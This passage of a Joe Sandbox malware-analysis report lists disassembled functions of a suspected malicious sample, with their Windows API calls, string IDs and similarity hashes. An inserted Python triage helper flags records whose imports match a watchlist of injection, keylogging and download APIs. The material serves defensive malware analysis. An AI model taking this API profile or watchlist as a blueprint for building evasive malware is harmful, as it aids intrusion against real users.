                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID: &
                                                    • API String ID: 2931989736-1010288
                                                    • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                    • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                    • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                    • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \
                                                    • API String ID: 4104443479-2967466578
                                                    • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                    • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                    • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                    • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00466825
                                                    • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CrackInternet_wcslen
                                                    • String ID: |
                                                    • API String ID: 596671847-2343686810
                                                    • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                    • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                    • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                    • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                    APIs
                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: '
                                                    • API String ID: 3850602802-1997036262
                                                    • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                    • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                    • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                    • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
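The records above are the Joe Sandbox IDA plugin's per-function listing: an "APIs" block of resolved imports (direct calls plus "Part of subcall function" entries), then the Similarity keys (API ID, String ID, Instruction Fuzzy Hash). Reading thousands of such records by eye is impractical, so the Python below, an added example that is not part of the Joe Sandbox report or its tooling, parses records in this layout and flags functions whose imports deserve a closer look. The SAMPLE text is constructed here in the shape of the listing (the second record is abridged), and the WATCHLIST names and tags are this example's own assumptions, not Joe Sandbox signature names.

```python
"""Triage helper for Joe Sandbox IDA-plugin function records (added example,
not Joe Sandbox code).  SAMPLE is constructed in the layout of the listing
above; WATCHLIST and its tags are this example's own assumptions."""
import re
from dataclasses import dataclass, field

# Constructed sample: four records in the report's layout (second one abridged).
SAMPLE = """\
APIs
• GetDesktopWindow.USER32 ref: 00472BB2
• GetDC.USER32(00000000), ref: 00472BBB
• GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
• ReleaseDC.USER32(00000000,?), ref: 00472BE8
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
APIs
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
APIs
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
• __wcsnicmp.LIBCMT ref: 00467288
• WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
Strings
Similarity
• API ID: Connection__wcsnicmp_wcscpy_wcslen
• String ID: LPT
• Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
APIs
• _wcslen.LIBCMT ref: 00466825
• InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
Similarity
• API ID: CrackInternet_wcslen
• String ID: |
• Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
"""

# "• [Part of subcall function ADDR: ]Name.MODULE[(args)], ref: ADDR"
API_RE = re.compile(
    r"^\s*•\s+(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s+)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)\s*$")
# "• Key: value" lines of the Similarity / Memory Dump Source sections
FIELD_RE = re.compile(r"^\s*•\s+(?P<key>[A-Za-z ]+?):\s?(?P<value>.*)$")
FIELDS = {"API ID": "api_id", "String ID": "string_id",
          "Instruction Fuzzy Hash": "fuzzy_hash"}


@dataclass
class FunctionRecord:
    api_id: str = ""
    string_id: str = ""
    fuzzy_hash: str = ""
    calls: list = field(default_factory=list)  # (name, module, ref, parent-or-None)


def parse_records(text):
    """One FunctionRecord per 'APIs' block; headings and unknown fields are skipped."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionRecord()
            records.append(cur)
        elif cur is not None and (m := API_RE.match(line)):
            cur.calls.append((m["name"], m["module"], m["ref"], m["parent"]))
        elif cur is not None and (m := FIELD_RE.match(line)) and m["key"] in FIELDS:
            setattr(cur, FIELDS[m["key"]], m["value"].strip())
    return records


# Assumed watchlist for a suspected stealer/dropper; tags are this example's labels.
WATCHLIST = {
    "InternetCrackUrlW": "URL parsing (download path)",
    "WNetUseConnectionW": "network share mapping",
    "WriteProcessMemory": "foreign memory write",
    "CreateRemoteThread": "remote thread (injection)",
    "SetWindowsHookExW": "hook installation (keylogging)",
}


def triage(records, watchlist=WATCHLIST):
    """[(api_id, fuzzy_hash, [(api, tag, called_directly)])] for records hitting the watchlist."""
    hits = []
    for rec in records:
        found = [(name, watchlist[name], parent is None)
                 for name, _mod, _ref, parent in rec.calls if name in watchlist]
        if found:
            hits.append((rec.api_id, rec.fuzzy_hash, found))
    return hits


def group_by_api_id(records):
    """API ID is the report's similarity key (same import sequence): {api_id: [fuzzy hashes]}."""
    groups = {}
    for rec in records:
        groups.setdefault(rec.api_id, []).append(rec.fuzzy_hash)
    return groups
```

API ID is the report's similarity key: two records that share an API ID but carry different Instruction Fuzzy Hashes, as the two GetDesktopWindow/GetDC/GetDeviceCaps/ReleaseDC functions above do, are two compiled copies of the same routine, which group_by_api_id surfaces. The called_directly flag in triage separates an import the function itself reaches from one it only reaches through a "Part of subcall function" entry, which is the distinction that matters when deciding which function to open in the disassembler.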
                                                    APIs
                                                    • _strlen.LIBCMT ref: 0040F858
                                                      • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                      • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                    • _sprintf.LIBCMT ref: 0040F9AE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove$_sprintf_strlen
                                                    • String ID: %02X
                                                    • API String ID: 1921645428-436463671
                                                    • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                    • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                    • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                    • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Combobox
                                                    • API String ID: 3850602802-2096851135
                                                    • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                    • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                    • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                    • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                    APIs
                                                    • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: LengthMessageSendTextWindow
                                                    • String ID: edit
                                                    • API String ID: 2978978980-2167791130
                                                    • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                    • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                    • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                    • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: GlobalMemorySleepStatus
                                                    • String ID: @
                                                    • API String ID: 2783356886-2766056989
                                                    • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                    • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                    • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                    • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: htonsinet_addr
                                                    • String ID: 255.255.255.255
                                                    • API String ID: 3832099526-2422070025
                                                    • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                    • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                    • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                    • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                    APIs
                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: InternetOpen
                                                    • String ID: <local>
                                                    • API String ID: 2038078732-4266983199
                                                    • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                    • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                    • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                    • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock_memmove
                                                    • String ID: EA06
                                                    • API String ID: 1988441806-3962188686
                                                    • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                    • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                    • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                    • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: u,D
                                                    • API String ID: 4104443479-3858472334
                                                    • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                    • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                    • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                    • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                    APIs
                                                    • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • wsprintfW.USER32 ref: 0045612A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend_mallocwsprintf
                                                    • String ID: %d/%02d/%02d
                                                    • API String ID: 1262938277-328681919
                                                    • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                    • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                    • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                    • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                    APIs
                                                    • InternetCloseHandle.WININET(?), ref: 00442663
                                                    • InternetCloseHandle.WININET ref: 00442668
                                                      • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleInternet$ObjectSingleWait
                                                    • String ID: aeB
                                                    • API String ID: 857135153-906807131
                                                    • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                    • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                    • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                    • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                    APIs
                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                    • PostMessageW.USER32(00000000), ref: 00441C05
                                                      • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: FindMessagePostSleepWindow
                                                    • String ID: Shell_TrayWnd
                                                    • API String ID: 529655941-2988720461
                                                    • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
